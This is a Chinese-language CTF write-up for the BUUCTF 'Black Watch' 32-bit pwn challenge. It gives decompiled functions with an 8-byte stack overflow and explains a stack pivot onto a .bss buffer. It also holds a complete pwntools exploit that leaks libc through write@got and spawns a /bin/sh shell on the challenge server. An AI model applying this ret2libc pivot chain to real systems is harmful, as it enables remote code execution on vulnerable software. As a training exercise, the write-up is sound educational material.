[buuctf][Black Watch 入群题]PWN
作者:互联网
[Black Watch 入群题]PWN
1.checksec:
2.运行一下:
3.ida分析:
1.main函数:
// Decompiled (IDA) entry point: calls the vulnerable routine once, prints
// "GoodBye!" and exits. The exploit below uses main's address as the return
// target of each ROP stage so that vul_function() is reached again.
int __cdecl main(int argc, const char **argv, const char **envp)
{
vul_function();
puts("GoodBye!");
return 0;
}
2.vul_function函数:
// Decompiled (IDA) body of the vulnerable routine. m1, m2 and s are globals
// defined outside this listing; s is the .bss buffer the exploit targets.
ssize_t vul_function()
{
size_t v0; // eax
size_t v1; // eax
char buf[24]; // [esp+0h] [ebp-18h] BYREF -- 24 bytes, directly followed by saved ebp (4) and the return address (4)
v0 = strlen(m1);
write(1, m1, v0); // prints m1: "Hello good Ctfer!" / "What is your name?"
read(0, &s, 0x200u); // up to 0x200 attacker-controlled bytes into the global s (.bss, fixed address) -- room for a full ROP chain
v1 = strlen(m2);
write(1, m2, v1); // prints m2: "What do you want to say?"
return read(0, buf, 0x20u); // 0x20 bytes into a 24-byte buffer: 8-byte overflow, exactly enough to overwrite saved ebp + return address (stack pivot)
}
4.利用思路:
首先需要泄漏libc地址。但栈上的buf只能溢出8字节(恰好覆盖保存的ebp和返回地址),远远不够在栈上构造ROP链;而s位于bss段、地址固定且可写入0x200字节,所以可以把ROP链放在s处,再用溢出的8字节把保存的ebp改成s_addr-4、返回地址改成leave;ret,从而把栈迁移到bss段执行ROP。整个过程做两次栈迁移:第一次调用write泄漏write@got并返回main,第二次调用system("/bin/sh")。
5.exp:
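# Exploit for the BUUCTF "Black Watch" pwn challenge (binary: spwn, 32-bit).
# Stage 1: put a ROP chain into the global .bss buffer `s`, pivot the stack
#          onto it through the 8-byte overflow in vul_function(), leak write@got.
# Stage 2: resolve libc from the leak, put system("/bin/sh") into `s`, pivot again.
from pwn import *
from LibcSearcher import LibcSearcher  # explicit import instead of `import *`

context.log_level = "debug"
context.arch = "i386"

# io = process("./spwn")
io = remote("node4.buuoj.cn", 28768)
elf = ELF("spwn")  # the challenge binary must be in the working directory

write_plt = elf.plt["write"]
write_got = elf.got["write"]
# Hard-coded addresses read from the binary. They assume the executable is
# loaded at a fixed base (non-PIE, cf. the checksec step above); with a
# PIE build they would have to be computed from a leaked image base.
main = 0x08048513        # return target: runs vul_function() again for the next stage
s_addr = 0x0804A300      # global `s` in .bss, filled by read(0, &s, 0x200)
leave_ret = 0x08048511   # `leave; ret` gadget used for the stack pivot

# --- stage 1: leak the runtime address of write() ---------------------------
io.recvuntil(b"name?")
# ROP chain stored at s: write(1, write_got, 4), then return into main.
payload1 = p32(write_plt) + p32(main) + p32(1) + p32(write_got) + p32(4)
io.send(payload1)

io.recvuntil(b"say?")
# 0x18 bytes fill buf, then saved ebp := s_addr-4 and return address := leave_ret.
# The gadget's `leave` sets esp = s_addr, `ret` pops write_plt from s.
# Exactly 0x20 bytes: read() takes no more, so use send(), not sendline(),
# or the trailing newline stays in stdin.
payload2 = b"A" * 0x18 + p32(s_addr - 4) + p32(leave_ret)
io.send(payload2)

# recvn(4) blocks until all 4 leaked bytes arrived; recv(4) may return fewer
# and would silently produce a garbage address.
write_addr = u32(io.recvn(4))
print("write_addr=" + hex(write_addr))

# --- resolve libc from the leaked write() address ---------------------------
libc = LibcSearcher("write", write_addr)
libc_base = write_addr - libc.dump("write")
print("libc_base=" + hex(libc_base))
system = libc_base + libc.dump("system")
bin_sh = libc_base + libc.dump("str_bin_sh")

# --- stage 2: system("/bin/sh") through the same pivot ----------------------
io.recvuntil(b"name?")
payload3 = p32(system) + p32(main) + p32(bin_sh)  # system(bin_sh), then back to main
io.send(payload3)
io.recvuntil(b"say?")
io.send(payload2)  # identical overflow: pivot onto the new chain at s
io.interactive()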
6.拿到flag: